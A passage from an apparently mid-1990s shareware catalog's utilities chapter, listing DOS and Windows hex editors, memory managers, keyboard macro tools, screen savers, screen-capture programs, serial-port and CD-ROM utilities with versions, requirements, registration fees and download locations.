0. + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Performs the functions of viewing, editing and/or printing a + selected file in both Hex and ASCII. File selection is by menu + choice rather that typing the path. Viewing and editing task + features include file positioning, search for string, search + and count, and search and replace. Program options may be + specified by command line/menu selection and saved as defaults; + a macro may be defined and run for repetative tasks. Printing + may be directed to any serial or parallel port or a disk file. + + + Product: WDiff + Windows file/directory/ZIP difference viewer. See full + description on page 50. + + Product: Win Change + Author: + Version: 3.6 (09-30-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 5); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WCHG36.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WCHG36.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 1207 + Download size: 387k (about 29 minutes with a 2400 baud modem) + Description: + Provides the ability to globally change and/or find text in + GRP, INI, PIF and other file types. Multiple change/ find + criteria can be specified, works across multiple drives, + including network drives. Provides the capability to "back + out" changes that go awry. Files that have been found or + changed can be viewed, copied, moved, or deleted. + + Chapter 2, "Utilities" 60 + + + + Product: XED + Author: , +61-2-3314521 + Version: 1.1b (08-24-94) + Needs: IBM AT (80286), DOS 3.1 or better. 384k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; EGA monitor. + Strongly recommended: VGA monitor; Dual 720k floppy drives; + Hard disk; Mouse. + Registration fee: $15.00 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $4.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). + Look for: XED11B.ZIP on BBSs (call GARBO.UWASA.FI to download it + at no charge); XED11B.EXE on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 100033,2563 for assistance). + Download size: 172k (about 13 minutes with a 2400 baud modem) + Description: + A powerful yet simple to use hex/binary file editor. Provides + all the features you'd expect from a binary editor, including + modify file size: insert/delete from any file; text filters; + unassemble; C-like assignment expressions; create C data + definitions; binary display and edit modes; multiple file + markers; search & replace; import file; ASCII/hex/binary/oct/ + dec tables; full mouse support; 25/28/43/50 line modes. A fast + friendly and indispensable tool. + + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 164. + + Chapter 2, "Utilities" 61 + + + + 2.3 Hardware utilities + + Product: SysChk + Author: , 408-298-3703 + Version: 2.38 (09-01-93) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Hard disk; Modem; Mouse; + Network (LAN); CD-ROM drive; EMS memory; XMS memory; math + coprocessor; sound card. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited fax, CompuServe, mail support; all ASP-wide + offers (see page 5). + Look for: availability unknown on BBSs. + SWREG#: 497 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + System information checker provides complete details on devices + installed in your system. Shows CPU, bus type, BIOS info, + mouse info, I/O port info, all disk information, CD-ROM, + network, video, memory info, TSRs, system speed, and lots more. + Print out a configuration report on your system. Includes + Pentium detection, I/O IRQs, and SCSI info. + + + 2.3.1 CPU & memory + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 106. + + Product: Free System Resources + Author: , 818-954-9128 + Version: 1.0 (12-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; VBRUN300.DLL. + Registration fee: $10.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 157k (about twelve minutes with a 2400 baud modem) + Description: + Provides notification of low resources. Tracks current and low + percentages for GDI, User and Mem resources. Lets you know + when you are low on resources before you get into trouble. + + Chapter 2, "Utilities" 62 + + + + Product: HiMOVE + Author: + Version: 2.20 (05-12-93) + Needs: IBM PC, DOS 3.0 or better. 286 NEAT CHIPSet or NEATsx + CHIPSet or AT/386 CHIPSet or other upper memory hardware. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; bonus utilities; all ASP-wide offers (see + page 5); disks of other shareware. + Look for: HIMOV220.ZIP on BBSs; HIMOVE.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 73030,1070 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + An upper memory manager for computers with a NEAT CHIPSet from + Chips & Technologies. Uses the shadow RAM capability of these + chipset to create a DOS5 compatible UMB (upper memory block) + area. It can also be used with any other type of UMB provider + software. Lets you load device drivers and resident programs + (TSRs) into unused areas of the upper memory area. Easy menu- + driven installation and configuration. No editing of + Autoexec.bat or Config.sys files is necessary. + + + Product: HiVIDEO + DOS memory expander for VGA/EGA systems. See full description + on page 66. + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Colorful system info Disk% MEMORY% 3-D pie. See full + description on page 115. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 108. + + Chapter 2, "Utilities" 63 + + + + Product: VMS40 - EMS emulator (disk) + Author: , +61-7-824-2843 + Version: 1.2 (04-05-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 5). + Look for: availability unknown on BBSs; VMS240.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 100036,311 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + Device Driver - emulates EMS memory on your hard disk Allows up + to 32Meg. Can load EMS page frame into high memory Also LMS40 + - converts high memory on 286/386 into EMS memory + + + 2.3.2 Keyboard + + Product: BATUTIL + Batch enhancement language. See full description on page 102. + + Product: DDKEY + Author: + Version: 2.02 (12-12-93) + Needs: IBM PC, DOS 2.0 or better. 8k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $18.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of mail support; bonus utilities. 1 free update disk(s) + sent out. + Look for: DDKEY202.ZIP on BBSs; DDKEY.ZIP on CompuServe in + ZNT:PBS forum LIBrary 0. + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + A 7.5k TSR key redefinition utility for writers and + programmers. Features pop-up editing, optional record mode, + literal key, halt for user entry in macros, chain to another + macro, instant on/off, pair shorthand, toggle CapsLock or + NumLock from macro, specified pause, reassign macros to other + key, automatic capitalization at sentence start, 24-hr alarm, + screen blanker, ASCII table, print screen to file, modify + cursor, load and save key files. Fully customizable. Includes + Dvorak layout utility. + + Chapter 2, "Utilities" 64 + + + + Product: STACKEY + Author: + Version: 4.0 (12-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $49.00 + Registration benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 76004,1664 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Has the basic function of stacking keystrokes. It uses English + like F1 for the F1 key rather than cryptic hex codes. It + includes simulated pressing of lock keys, shifts, support for + Carousel, Desqview and hotkey/screen reading script control. PC + Magazine called it the 'ultimate batch enhancer' and PC World + and PC Computing included it in "Best of.." articles. Has a + keyboard recorder and more script control, including branching + on hotkeys and screen strings. + + + 2.3.3 Screen + + Product: ATTRB + Author: + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM. + Registration fee: $5.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + discounts on upgrades. + Look for: availability unknown on BBSs; ATTRB.EXE on CompuServe + in CIS:PCUTIL forum LIBrary 1 (or contact userID 72345,1623 for + assistance). + Download size: 21k (about two minutes with a 2400 baud modem) + Description: + Easy-to-use, intuitive, full screen, WYSIWYG, file attribute + changing utility to replace dos's ATTRIB. Changes attributes + for directory, file or all files at once. Wildcard selection + and directory changing within the program. + + + Product: A Batch View + Menus/msgs/info/utilities for DOS batch files. See full + description on page 101. + + Chapter 2, "Utilities" 65 + + + + Product: BLANK-IT + Author: , 401-767-3106 + Version: 5.1b (10-11-92) + Needs: IBM PC, DOS 2.0 or better. 1k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $15.00 + Registration benefits: Full program functionality; 12 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products. + Look for: BLANK51B.ZIP on BBSs (call 401-767-3931 to download it + at no charge); BLANK5.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 59k (about five minutes with a 2400 baud modem) + Awards & nominations: 1990 winner, Public Brand Software + contests for useful programs. + Description: + Blacks out the computer display after a certain "time out" + period so that the computer screen won't become burned in. Burn + in is not uncommon and can destroy a monitor. Contains several + advanced features such as a quick blank "hot key" (Boss key"), + the ability to enable/disable itself while it's loaded, and + much more. Works with all monitors and is compatible with + Windows! Smaller and faster than the rest with more features + and excellent support! + + + Product: BLANK-IT API Specifications + Author: , 401-767-3106 + Version: 5.1b (10-29-92) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $0.00 + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; source code; all ASP-wide offers (see page 5); + discounts on other products. + Look for: APIBLANK.ZIP on BBSs (call 401-767-3931 to download it + at no charge); APIBLK.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A package containing a program, source code, and an API + reference for use with the BLANK-IT screen saver program. + Utilizes the BLANK-IT API to blank the screen and/or unblank + the screen on demand. This program can be used in a DOS batch + file, an application's "script" file, from the WordPerfect + SHELL, and more! Includes full 'C' source code for programmers + to see how to use it! Includes the BLANK-IT API Reference. + + + Product: QRead + Read any text file w/ font sizing in Win 3.1. See full + description on page 55. + + Chapter 2, "Utilities" 66 + + + + Product: WINPAK #1 + Author: , 401-767-3106 + Version: 1.2 (01-20-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $14.95 + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on other + products. + Look for: WINPAK1.ZIP on BBSs (call 401-767-3931 to download it + at no charge); WNPAK1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + A collection of high quality, entertaining screen saver modules + designed to be installed on a system running Windows 3.1. Our + modules are added to the list of screen savers that are + recognized by the Windows Control Panel/Desktop option for + choosing a screen saver. Consists of eight different screen + saver modules and a convenient, easy to use installation + utility. Experience our animation! + + + 2.3.3.1 EGA/VGA specific + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 494. + + Product: HiVIDEO + Author: + Version: 2.03 (05-08-93) + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; site license; all ASP-wide offers (see page 5); + disks of other shareware. + Look for: HIVID203.ZIP on BBSs; HIVID.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 73030,1070 for + assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + Uses the unused graphics memory of the VGA/EGA display adapter + in text mode to expand the conventional DOS memory by 96kB. The + graphics modes are disabled if the conventional memory is + expanded in this way. The expansion can be switched on and off + dynamically from the command line. + + Chapter 2, "Utilities" 67 + + + + Product: Palette Adjuster + Author: , 314-861-1500 + Version: 1.8 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; VGA + monitor. + Registration fee: $10.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + mail support; all ASP-wide offers (see page 5). + Look for: PAL18.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PAL18.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 70700,630 for assistance). + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Customize VGA palette to any color you like. Gives your screen + that truely customized look! + + + Product: VPT + Author: , 518-438-5548 + Version: 4.15 (12-29-91) + Needs: IBM AT (80286), DOS 3.1 or better. VGA monitor. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; VPT415.ZIP on CompuServe + in CIS:PCHW forum LIBrary 3 (or contact userID 76156,164 for + assistance). + Download size: 27k (about two minutes with a 2400 baud modem) + Description: + An interactive, easy to use color setting program for the VGA/ + MCGA. Allows use of all 262,144 VGA color shades in text mode. + Includes color files, command-line or interactive mode. Slick, + graphical-type display, no numbers to type. + + + 2.3.3.2 Screen savers + + If you see "bonus graphics" as a registration benefit for any + of these products, it usually means the author will scan the + color image of your choice for use in your screen saver. + Please contact the author of the product for more details. + + Chapter 2, "Utilities" 68 + + + + Product: CUSTOM SCREEN SAVER (WINDOWS) + Author: , 619-247-2804 + Version: 1.0 (01-15-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse; VBRUN300.DLL. Vbrun300.Dll. + Strongly recommended: CD-ROM drive; sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + all ASP-wide offers (see page 5); discounts on other products. + Look for: CUSTSAVR.ZIP on BBSs. + Download size: 1343k (about 100 minutes with a 2400 baud modem) + Description: + Build your very own custom screen saver with this program. + Registered users can add up to 100 of their own pictures to be + displayed as a screen saver. If you have a Midi, registered + users can add up to 100 midi music files to be played as their + screen saver displays their pictures. Those with a CD-ROM will + be able to listen to CD-AUDIO while the screen saver runs. + Image and Midi files may be individually added. Password + protection and message capability if desired. Images provided. + + + Product: The Lights Go Down + Author: + Version: 2.20 (07-07-95) + Needs: IBM AT (80286), Windows 3.0 or better. 2048k RAM; EGA + monitor; Hard disk. (Windows 3.0 must run in Protected [not + Real] Mode.). + Strongly recommended: SVGA monitor; Mouse; sound card. + Registration fee: US$25.00 (add US$4.00 for shipping to U.S. + addresses) (add US$4.00 for shipping to Canadian addresses) + (add US$4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 5); discounts on + upgrades. Bonus source code. + Look for: LIGHTS22.ZIP on BBSs; LIGHTOUT.ZIP on CompuServe in + CIS:PIKAPRO forum LIBrary 18 (or contact userID 100550,324 for + assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Screen saver collection with 28 modules with password and + randomizer. Tremendous graphics, great animations (e.g. Flying + Pigs), surprising special effects. Bitmap Show for .BMP & .JPG + files (sequentially for presentations or by random). Fractal + images with palette animation. Plus dice game and 2 utilities + (WinPulse: graphical display of CPU usage, WControl: exit or + re-start Windows easily). + + Chapter 2, "Utilities" 69 + + + + The German version WEEP was a winner in Ziff-Davis' European + Shareware Awards 1995 (Games category). + + + Product: Mystic Pixels + Author: + Version: 1.1 (06-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $7.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: MSTPIX11.ZIP on BBSs; MSTPIX.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 71500,3566 for + assistance). + SWREG#: 2853 + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + A "kinder, gentler" Windows screen saver that slowly + manipulates pixels on the screen. It runs in one of ten + different modes that either move, recolor, or erase pixels. You + can pick a mode or allow it to randomly pick one each time it + starts. Some modes eventually fade the screen to black while + the others move or recolor the pixels originally on the screen. + + + Product: Photo Show 3D + Author: + Version: 1.21 (03-05-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; SVGA + monitor. 386+ and 256(exactly) color Windows video driver. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 6 months of unlimited CompuServe, mail + support; bonus graphics; all ASP-wide offers (see page 5); + disks of other shareware; discounts on upgrades. JPG image + support. + Look for: availability unknown on BBSs; PS3D.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 73047,253 for + assistance). + SWREG#: 3243 + PsL#: 11590 + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + A Windows screen saver that maps a BMP or PCX image to the + surface of a 3D object and tumbles it across the screen. The + object may be either a flat rectangle with the image on each + side, a cube with the image on all six sides, or a custom ball + shape with a user selectable number of facets. The image may be + + Chapter 2, "Utilities" 70 + + + + either mapped around one half of the custom object or tiled + onto each facet. Great for logos and family photos! + + + Product: Screen Saver Sampler + Author: , 603-485-2677 + Version: 2.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk. + Strongly recommended: SVGA monitor; Mouse. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, mail + support; all ASP-wide offers (see page 5); discounts on other + products. Bonus screen saver sampler. + Look for: availability unknown on BBSs. + Download size: 2500k (about 186 minutes with a 2400 baud modem) + Description: + Has 24 full-screen images best suited for 256-color VGA cards. + All images are 640 X 480 pixels. 6 images each are shown from + 4 major Damsel screen saver collections; New England + Wildflowers, New Hampshire Wilderness, the Big Sky Collection, + and the Damsel Surreal Art Collection. Screen display time + (approx 30 sec on a 486/33Mhtz) and transition effects are + hard-wired, but password protection and mouse aware/ignore + choices are included. + + + Product: Seascape + Author: , 415-424-1403 + Version: 1.4 (11-26-93) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 6 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; SEAS14.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 4 (or contact userID 71204,2226 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + A Windows 3.1 screen saver which displays relatively realistic + fish (Sergeant Majors) and tiny animals on which they feed. The + animation quality is far better than in the usual cartoon-like + fish screen savers, winning comments from users such as + "Beautiful design job" and "Great fish! Just like the real + thing" and "It looks beautiful!", and leading PC Computing (May + '93) to select it as a "Best Bet". + + Chapter 2, "Utilities" 71 + + + + Product: WinSecure + Author: , 714-777-8362 + Version: 2.0 (03-01-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $5.00 (add $2.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support. + Look for: WINSEC20.ZIP on BBSs; WINSEC.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 71127,2610 for + assistance). + Download size: 390k (about 29 minutes with a 2400 baud modem) + Description: + Hot key from any Windows program and your personalized + screensaver appears instantly to hide your work. You have the + option to password protect your system. When you return to + continue work, enter your password and it shows you messages + left for you by others, any invalid password attempts, and + whether your PC has been rebooted. Step away from your desk in + style and security. Displays image after time delay and works + as default Windows desktop screen saver. + + + 2.3.3.3 Screen capture + + See also: Utilities, Printer utilities; Graphics, Utilities, + Graphic screen capture. + + Product: Capbuf + Author: , 206-523-6135 + Version: 1.41 (12-28-90) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; CAPBUF.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + A memory resident (TSR) program that lets you capture any text + screen and save it for later processing or printing. It's quite + useful for programs that do not otherwise provide means of + printing their results: such as intermediate results of games, + or collecting copies of messages while on a bulletin board. + Also includes a filter to remove line drawing characters. + + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 63. + + Chapter 2, "Utilities" 72 + + + + Product: GEMCAP + Author: , 708-377-7320 + Version: 4.02 (03-07-93) + Needs: IBM PC, DOS 3.0 or better. 4k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: availability unknown on BBSs; GEMCAP.ZIP on CompuServe + in CIS:WPUSER forum LIBrary 16 (or contact userID 70047,744 for + assistance). + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + Captures DOS text and graphics screens to individual GEM .IMG + format bitmap files. Preserves reverse video and colors for + black and white printing. Retains high res VGA/EGA fonts so + your screens print exactly as they look to the user. Very + useful for software documentation. Works with CGA, VGA, EGA, + graphics modes, and any 80 column text mode - 43 & 50 line + modes. Captured files load in WordPerfect and other programs + that import GEM .IMG files. + + + Product: Quilt + Create intriguing patterns/scrn saver option. See full + description on page 517. + + Product: SCP + Author: , 718-625-2262 + Version: 1.04 (11-18-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Dual 720k floppy drives; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; EMS memory; XMS memory. + Registration fee: $0.00 (Canadian dollars) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: SCP104.ZIP on BBSs (call 718-625-0411 to download it at + no charge); SCP104.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 71570,3055 for assistance). + Download size: 384k (about 29 minutes with a 2400 baud modem) + Description: + Captures DOS text screens and converts them to various graphic + file formats including .PCX .WPG .TIF .IMG. Allows changing + attributes and scaling. + + Chapter 2, "Utilities" 73 + + + + Product: Textshot + Author: , 214-239-9646 + Version: 4.0 (02-03-95) + Needs: IBM PC, DOS 2.1 or better. 23k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: TSHOT4.ZIP on BBSs; TSHOT.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 70353,1644 for + assistance). + SWREG#: 5219 + PsL#: 11951 + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Saves images from any character-mode screen of 80 columns or + greater to color or B/W PCX graphics files as well as to + standard ASCII text files. When running on a VGA Textshot + accurately captures user-loaded fonts. Features: image + clipping, selectable fonts, image inversion and color patterns. + + + 2.3.4 286/386/486-specific + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 106. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 494. + + Product: HiMOVE + Upper memory manager. See full description on page 61. + + 2.3.5 Sound card + + See also: Utilities, Hardware utilities, CD-ROM. + + Product: Music Sculptor for Windows + MIDI sequencer with music keyboard window. See full + description on page 562. + + 2.3.6 Serial & parallel port + + Product: Alad_IRQ + Lets GEnie Aladdin software use any IRQ. See full description + on page 374. + + Chapter 2, "Utilities" 74 + + + + Product: CTS Serial Port Utilities + Author: , 404-263-8623 + Version: 1.2 (12-06-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, fax, CompuServe, GEnie, mail + support; bonus utilities; discounts on other products; + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: CTSSPU12.EXE on BBSs; CTSSPU.EXE on CompuServe in + CIS:PCCOM forum LIBrary 7 (or contact userID 76662,2315 for + assistance); CTSSPU12.EXE on GEnie in IBMPC forum LIBrary 5 (or + contact userID J.JERRIM for assistance). + SWREG#: 1750 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A "must have" set of com port testing and control utilities for + consultants, PC support personnel, and anyone with a + communication problem. Detects common problems such as multiple + ports at the same address (eg: two Com1 ports), PCs which can't + use Com4, mouse/modem IRQ conflicts, shared IRQs, serial ports + which can't generate IRQs, and conflicting BIOS assignments. + Identifies all serial ports by UART type (including T/Ports and + emulated UARTs), address, and the actual IRQ used. + + + Product: Serial File Copy + Author: , 205-881-4630 + Version: 3.5 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, mail + support; bonus utilities; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; SFC35.ZIP on CompuServe + in CIS:PCCOM forum LIBrary 2 (or contact userID 70671,1340 for + assistance). + PsL#: 10907 + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Copies files, including entire directory trees, between IBM PC + compatibles at 115,200 baud. Uses 16 bit CRC, has on-line help, + many transfer options. Can copy entire hard disk directory + structure from one PC to another at one time. + + Chapter 2, "Utilities" 75 + + + + 2.3.7 CD-ROM + + See also: Utilities, Hardware utilities, Sound card. + + Product: CD-QUICK Cache + Author: , 609-875-5433 + Version: 1.20 (06-12-95) + Needs: IBM AT (80286), DOS 3.1 or better. 11k RAM; CD-ROM drive; + XMS memory. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 5). Lifetime free upgrading allowed. + Look for: CDQCK120.ZIP on BBSs (call 609-764-0812 to download it + at no charge); CDQCK.ZIP on CompuServe in CIS:PCHW forum + LIBrary 1 (or contact userID 72202,3043 for assistance). + SWREG#: 4214 + PsL#: 11726 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + This small TSR will dramatically improve the performance of + your CD-ROM drive by storing frequently read data in fast XMS + memory. Uses advanced caching techniques and dynamic read-ahead + buffering to insure top performance. Includes CDTEST to measure + your CD-ROM drive's performance and the Windows' QUICKMON + program to show cache statistics in real time. Comes with an + easy-to-use INSTALL program, so you can be up and running in + less than 60 seconds! Works with any CD-ROM drive. + + + Product: MicroPlayerCD(tm) + Author: , 714-524-5625 + Version: 1.03 (02-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; Hard + disk; Mouse; CD-ROM drive. + Strongly recommended: VGA monitor; sound card. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; MPCD10.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 6 (or contact userID 72301,2164 for + assistance). + SWREG#: 2081 + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Play audio CDs on your computer's CD-ROM. Control of screen + layout; optional vertical display. Resizable to virtually any + size: half the height of an icon to 